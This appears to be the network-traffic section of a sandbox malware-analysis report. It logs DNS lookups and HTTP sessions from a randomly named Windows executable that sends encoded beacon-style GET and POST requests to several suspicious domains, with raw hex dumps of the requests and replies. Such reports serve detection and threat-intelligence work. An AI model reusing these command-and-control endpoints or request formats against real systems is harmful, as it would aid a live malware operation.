Jan 11, 2025 02:54:40.107928991 CET	80	49985	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:40.111424923 CET	49985	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:41.155338049 CET	49985	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:41.160243034 CET	80	49985	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:42.177692890 CET	49986	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:42.184257984 CET	80	49986	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:42.184397936 CET	49986	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:42.199033022 CET	49986	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:42.203984976 CET	80	49986	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:42.204197884 CET	80	49986	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:42.660573006 CET	80	49986	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:42.660638094 CET	49986	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:43.701992989 CET	49986	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:43.707108974 CET	80	49986	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:44.721060991 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:44.725976944 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:44.726047039 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:44.736860991 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:44.742810965 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193135023 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193166018 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193177938 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193190098 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193298101 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:45.193459988 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193471909 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193483114 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193511009 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:45.193533897 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193547010 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193573952 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:45.193574905 CET	80	49987	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:45.193617105 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:45.199207067 CET	49987	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:45.205461979 CET	80	49987	84.32.84.32	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:53:41.165992022 CET	49488	53	192.168.2.10	1.1.1.1
Jan 11, 2025 02:53:41.178637981 CET	53	49488	1.1.1.1	192.168.2.10
Jan 11, 2025 02:53:56.845695019 CET	62436	53	192.168.2.10	1.1.1.1
Jan 11, 2025 02:53:56.948457956 CET	53	62436	1.1.1.1	192.168.2.10
Jan 11, 2025 02:54:10.315254927 CET	57767	53	192.168.2.10	1.1.1.1
Jan 11, 2025 02:54:10.326186895 CET	53	57767	1.1.1.1	192.168.2.10
Jan 11, 2025 02:54:23.721194029 CET	57938	53	192.168.2.10	1.1.1.1
Jan 11, 2025 02:54:23.744086027 CET	53	57938	1.1.1.1	192.168.2.10
Jan 11, 2025 02:54:37.018598080 CET	64009	53	192.168.2.10	1.1.1.1
Jan 11, 2025 02:54:37.071832895 CET	53	64009	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 02:53:41.165992022 CET	192.168.2.10	1.1.1.1	0x7352	Standard query (0)	www.hirmic4820voe.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:53:56.845695019 CET	192.168.2.10	1.1.1.1	0x55fa	Standard query (0)	www.elinor.club	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:54:10.315254927 CET	192.168.2.10	1.1.1.1	0x938d	Standard query (0)	www.happytrail.life	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:54:23.721194029 CET	192.168.2.10	1.1.1.1	0x3e	Standard query (0)	www.spinpinang01.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:54:37.018598080 CET	192.168.2.10	1.1.1.1	0xcf93	Standard query (0)	www.athanasopoulos.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 02:52:35.800616980 CET	1.1.1.1	192.168.2.10	0x2939	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:52:35.800616980 CET	1.1.1.1	192.168.2.10	0x2939	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:53:41.178637981 CET	1.1.1.1	192.168.2.10	0x7352	No error (0)	www.hirmic4820voe.shop	hirmic4820voe.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:53:41.178637981 CET	1.1.1.1	192.168.2.10	0x7352	No error (0)	hirmic4820voe.shop		162.0.215.91	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:53:56.948457956 CET	1.1.1.1	192.168.2.10	0x55fa	No error (0)	www.elinor.club		194.58.112.174	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:54:10.326186895 CET	1.1.1.1	192.168.2.10	0x938d	No error (0)	www.happytrail.life		199.192.23.123	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:54:23.744086027 CET	1.1.1.1	192.168.2.10	0x3e	No error (0)	www.spinpinang01.click	spinpinang01.click		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:54:23.744086027 CET	1.1.1.1	192.168.2.10	0x3e	No error (0)	spinpinang01.click		66.29.146.78	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:54:37.071832895 CET	1.1.1.1	192.168.2.10	0xcf93	No error (0)	www.athanasopoulos.xyz	athanasopoulos.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:54:37.071832895 CET	1.1.1.1	192.168.2.10	0xcf93	No error (0)	athanasopoulos.xyz		84.32.84.32	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.hirmic4820voe.shop

www.elinor.club

www.happytrail.life

www.spinpinang01.click

www.athanasopoulos.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49971	162.0.215.91	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:53:41.200656891 CET	401	OUT	GET /3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q== HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.hirmic4820voe.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Jan 11, 2025 02:53:41.779856920 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Sat, 11 Jan 2025 01:53:41 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Jan 11, 2025 02:53:41.779872894 CET	224	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
Jan 11, 2025 02:53:41.779884100 CET	1236	IN	Data Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
Jan 11, 2025 02:53:41.779895067 CET	1236	IN	Data Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
Jan 11, 2025 02:53:41.779905081 CET	1236	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
Jan 11, 2025 02:53:41.779916048 CET	672	IN	Data Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
Jan 11, 2025 02:53:41.779927015 CET	1236	IN	Data Raw: 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48 Data Ascii: I9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7
Jan 11, 2025 02:53:41.779939890 CET	1116	IN	Data Raw: 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 67 65 6a 65 6d 36 56 73 7a 77 61 4e 4a 35 49 51 54 39 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d Data Ascii: BdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab
Jan 11, 2025 02:53:41.780478954 CET	1236	IN	Data Raw: 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67 Data Ascii: WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code {
Jan 11, 2025 02:53:41.780498028 CET	918	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.hirmic4820voe.shop/cp_errordocument.shtml (port 80)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49972	194.58.112.174	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:53:56.971138954 CET	656	OUT	POST /izuw/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.elinor.club Origin: http://www.elinor.club Referer: http://www.elinor.club/izuw/ Content-Type: application/x-www-form-urlencoded Content-Length: 194 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 53 34 48 50 49 39 4c 72 43 4f 57 45 6f 4c 4c 56 61 4e 38 50 38 4d 4e 62 44 6e 62 56 53 43 45 51 78 70 71 6c 67 4c 63 62 44 64 36 4e 70 73 52 41 38 34 46 6b 45 37 2f 4e 55 2b 65 65 47 4d 34 59 4b 72 54 50 6a 70 77 72 61 2f 31 6c 54 6c 66 36 54 39 56 6a 4a 72 6c 72 79 6b 4c 69 37 76 4b 36 68 36 2b 32 71 47 65 68 69 69 55 39 65 53 76 39 6e 50 4b 78 72 77 47 42 4f 6b 32 6e 35 47 63 45 69 45 33 48 4e 46 71 79 39 57 6b 55 61 70 4b 47 76 66 61 61 7a 66 63 43 5a 7a 31 59 78 34 6d 67 71 51 4d 4a 56 6f 6d 4c 37 6e 47 5a 64 55 75 65 Data Ascii: 0lTTc=msZ4rMLyjYtOS4HPI9LrCOWEoLLVaN8P8MNbDnbVSCEQxpqlgLcbDd6NpsRA84FkE7/NU+eeGM4YKrTPjpwra/1lTlf6T9VjJrlrykLi7vK6h6+2qGehiiU9eSv9nPKxrwGBOk2n5GcEiE3HNFqy9WkUapKGvfaazfcCZz1Yx4mgqQMJVomL7nGZdUue
Jan 11, 2025 02:53:57.649286985 CET	341	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 11 Jan 2025 01:53:57 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://elinor.club/izuw/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49973	194.58.112.174	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:53:59.520834923 CET	680	OUT	POST /izuw/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.elinor.club Origin: http://www.elinor.club Referer: http://www.elinor.club/izuw/ Content-Type: application/x-www-form-urlencoded Content-Length: 218 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 54 5a 33 50 4f 63 4c 72 48 75 57 48 30 62 4c 56 55 74 38 55 38 4d 42 62 44 6d 76 38 53 78 73 51 77 49 61 6c 78 36 63 62 41 64 36 4e 6d 4d 52 42 69 49 45 71 45 37 79 77 55 36 43 65 47 4d 63 59 4b 71 44 50 6a 2b 45 71 56 50 31 37 59 46 66 34 4f 4e 56 6a 4a 72 6c 72 79 6b 75 31 37 76 69 36 68 4c 4f 32 34 79 71 6d 6b 53 55 36 4a 69 76 39 6a 50 4b 31 72 77 47 76 4f 6c 72 38 35 45 6b 45 69 47 76 48 4e 78 2b 39 30 57 6b 57 56 4a 4b 59 69 74 66 53 72 63 70 35 62 53 74 5a 68 34 33 49 74 78 78 4f 45 35 48 63 6f 51 61 58 54 53 62 30 51 38 71 38 74 35 54 65 38 53 4f 76 73 50 50 36 6c 32 33 74 72 77 3d 3d Data Ascii: 0lTTc=msZ4rMLyjYtOTZ3POcLrHuWH0bLVUt8U8MBbDmv8SxsQwIalx6cbAd6NmMRBiIEqE7ywU6CeGMcYKqDPj+EqVP17YFf4ONVjJrlryku17vi6hLO24yqmkSU6Jiv9jPK1rwGvOlr85EkEiGvHNx+90WkWVJKYitfSrcp5bStZh43ItxxOE5HcoQaXTSb0Q8q8t5Te8SOvsPP6l23trw==
Jan 11, 2025 02:54:00.195969105 CET	341	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 11 Jan 2025 01:54:00 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://elinor.club/izuw/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49974	194.58.112.174	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:02.068490982 CET	1693	OUT	POST /izuw/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.elinor.club Origin: http://www.elinor.club Referer: http://www.elinor.club/izuw/ Content-Type: application/x-www-form-urlencoded Content-Length: 1230 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 54 5a 33 50 4f 63 4c 72 48 75 57 48 30 62 4c 56 55 74 38 55 38 4d 42 62 44 6d 76 38 53 78 30 51 77 36 69 6c 6a 70 45 62 42 64 36 4e 76 73 52 45 69 49 46 32 45 37 36 30 55 39 4b 4f 47 4f 55 59 4c 49 62 50 30 36 59 71 4f 2f 31 37 58 6c 66 39 54 39 56 4d 4a 72 31 33 79 6b 65 31 37 76 69 36 68 49 57 32 36 6d 65 6d 6d 53 55 39 65 53 76 50 6e 50 4c 6f 72 78 76 53 4f 6c 75 4a 36 31 45 45 69 6d 2f 48 57 6e 43 39 70 6d 6b 75 5a 70 4c 4c 69 73 6a 64 72 63 30 43 62 53 4a 7a 68 36 6e 49 6f 48 6f 78 61 6f 6d 46 7a 51 4f 52 4e 44 50 56 65 61 6d 70 31 5a 65 65 33 42 43 52 2b 2b 53 33 6e 46 33 6a 32 64 6a 69 52 44 32 55 34 4d 6a 43 75 75 72 42 6d 4f 78 4b 78 4f 34 33 5a 70 43 39 53 2b 63 77 36 34 56 49 44 42 75 7a 58 5a 34 49 30 4b 7a 4a 41 73 77 31 69 48 53 39 68 47 66 53 37 37 70 68 6a 6d 75 2f 33 41 44 4a 57 32 6f 42 2b 43 68 46 31 41 7a 6c 51 32 71 53 6e 4e 33 64 49 39 37 53 61 59 43 42 52 42 59 39 64 48 6c 75 6d 65 35 42 54 46 35 75 58 2f 76 59 37 70 30 44 [TRUNCATED] Data Ascii: 0lTTc=msZ4rMLyjYtOTZ3POcLrHuWH0bLVUt8U8MBbDmv8Sx0Qw6iljpEbBd6NvsREiIF2E760U9KOGOUYLIbP06YqO/17Xlf9T9VMJr13yke17vi6hIW26memmSU9eSvPnPLorxvSOluJ61EEim/HWnC9pmkuZpLLisjdrc0CbSJzh6nIoHoxaomFzQORNDPVeamp1Zee3BCR++S3nF3j2djiRD2U4MjCuurBmOxKxO43ZpC9S+cw64VIDBuzXZ4I0KzJAsw1iHS9hGfS77phjmu/3ADJW2oB+ChF1AzlQ2qSnN3dI97SaYCBRBY9dHlume5BTF5uX/vY7p0DtYn3T5/7B6rnL/7vL5U+jXtbZ/qkHs8F0RYvn4vgcwcLG3I/K+tudlnmPlRBnmeBJPJ4ixcc5/pyKpCUlrCfrSgwa1YDqDFbDEqnMA4Ej1v/GymkHUwG6FK/5yAwa7PRnI0f/XWBItc0TgpK7OO3WsbiiXuhx/kFVLebik3idrD8wKYzgHi1CrLZVJaVR88q9HNJYlVwDyKZ1vfWf3dXeOec3wRUt3XDNNPHDmWyJNcPi1PScIYD0a3yBFT8D9ia4p5dB1wlzSOZPbnEux4UTtlEiZcFfHsct3M9sjiuO8VRkwASccOkpTM4z/AdaXtQOuebcVerifw1Cisj6NnD23FKDzFF7xrZXjYf0SEQNXTySoiTwn8pT6OTrR6rYh3dTwo7Q1hxz0LRZapGB3z/LqDW5zf/RPNg/axuejMz7mdXM3JH06aHVtXRrUqOqVp2alTvFu+M52CoNmWpySHTnKSzj+o2VmQog1D5WPCKuGQvi4yIFfW8cOxDw6Z6e88T+Et2i2j2sUOdxXwptKedzvlc68wR14yhI9VfF+TV1zBd5bTdXFqkv7jW0EMapSmdV7nTZfM15XkhIERx2EzOKSi8fW2wXRbapUyf5oa85iQHE80p3ws4yuv/6ovsse3d60pRgf+/8nn4Hg7oQ8UsfqWD6kUejczdgW [TRUNCATED]
Jan 11, 2025 02:54:02.756947994 CET	341	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 11 Jan 2025 01:54:02 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://elinor.club/izuw/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49975	194.58.112.174	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
